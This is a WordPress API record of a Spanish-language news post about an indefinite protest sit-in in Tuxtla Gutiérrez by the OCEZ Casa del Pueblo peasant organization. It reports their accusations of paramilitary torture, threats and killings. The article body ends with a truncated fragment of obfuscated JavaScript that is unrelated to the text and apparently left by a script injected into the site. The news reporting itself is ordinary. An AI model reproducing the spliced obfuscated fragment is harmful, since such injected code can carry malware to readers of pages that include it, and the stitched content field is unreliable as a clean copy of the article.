{"id":10293,"date":"2023-06-01T03:13:41","date_gmt":"2023-06-01T03:13:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10293"},"modified":"2023-06-01T03:13:42","modified_gmt":"2023-06-01T03:13:42","slug":"ocez-casa-del-pueblo-inicia-planton-indefinido-en-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10293","title":{"rendered":"OCEZ Casa del Pueblo, inicia plant\u00f3n indefinido en Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1685589168719-1024x768.jpg\" alt=\"\" class=\"wp-image-10294\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1685589168719-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1685589168719-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1685589168719-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1685589168719.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>31 de mayo del 2023. Tuxtla Guti\u00e9rrez. &#8211; Al menos 700 integrantes de la Organizaci\u00f3n Campesina Emiliano Zapata-Casa del Pueblo, realizaron una marcha en la capital chiapaneca y se instalaron en plant\u00f3n indefinido para pedir la desarticulaci\u00f3n de grupos paramilitares y poner fin al conflicto de tierras que se ha extendido por varias d\u00e9cadas.<\/p>\n\n\n\n<p>\u201cDesde este 31 de mayo iniciamos una marcha plant\u00f3n indefinido en la capital del estado y una jornada de diversas actividades pol\u00edticas en el municipio de Venustiano Carranza, Chiapas. Por acuerdo de la Asamblea General, ya que no cesa el hostigamiento que hacen los paramilitares mal llamados Alianza San Bartolom\u00e9 de Los Llanos, encabezados por unos supuestos dirigentes del paraje Para\u00edso del Grijalva\u201d, indicaron.<\/p>\n\n\n\n<p>Indicaron que, actualmente los campesinos tienen la necesidad de subir a trabajar en sus parcelas, por ser la \u00e9poca de la preparaci\u00f3n de los terrenos para el cultivo del ma\u00edz de temporal y debido a las incursiones armadas que este grupo narcoparamilitar realiza en el territorio comunal y a una serie de hostigamientos hacia sus compa\u00f1eros<br>comuneros, los ataques no han cesado.<\/p>\n\n\n\n<p>Acusaron que: \u201cComo el ultimo acontecimiento de fecha 22 de mayo del a\u00f1o en curso, en el predio denominado El Chofle, donde los hermanos Bartolo, Jos\u00e9 Calvo Mart\u00ednez y la se\u00f1ora Martha Jim\u00e9nez V\u00e1zquez, fueron torturados con una soga al cuello y con un arma de alto calibre en la espalda; amenazados de muerte, reiter\u00e1ndoles que esta seria la \u00faltima ocasi\u00f3n que salieran con vida y para la pr\u00f3xima saldr\u00edan descuartizados y embolsados. Demostrando con estas acciones su capacidad b\u00e9lica y su actuar propio del crimen organizado\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Se\u00f1alaron que, este grupo ha sido el responsable del asesinato de 3 compa\u00f1eros en sus trabajaderos en el a\u00f1o 1973, la emboscada de 1984 donde asesinaron a 9 compa\u00f1eros incluidos varios menores de edad, y los asesinatos del a\u00f1o 2001, las emboscadas y asesinato de dos compa\u00f1eros el 04 de mayo y tres compa\u00f1eros el 12 de junio de 2021, as\u00ed como el desplazamiento de los compa\u00f1eros de los poblados Yax Ch&#8217;en de Los Pobres, Nuevo San Bartolom\u00e9 de Los Llanos y el destrozo de casas en Santa Isabel Las Delicias.<\/p>\n\n\n\n<p>Es por ello que, han tomado la decisi\u00f3n de quedarse en plant\u00f3n indefinido hasta que los tres niveles de gobierno atiendan estas demandas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 31 de mayo del 2023. Tuxtla Guti\u00e9rrez. &#8211; Al menos 700 integrantes de la Organizaci\u00f3n Campesina Emiliano Zapata-Casa del Pueblo, realizaron una marcha en la capital chiapaneca y se instalaron en plant\u00f3n indefinido para pedir la desarticulaci\u00f3n de grupos paramilitares y poner fin al conflicto de tierras que se ha extendido por varias &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10294,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-10293","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10293"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10293\/revisions"}],"predecessor-version":[{"id":10295,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10293\/revisions\/10295"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10294"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}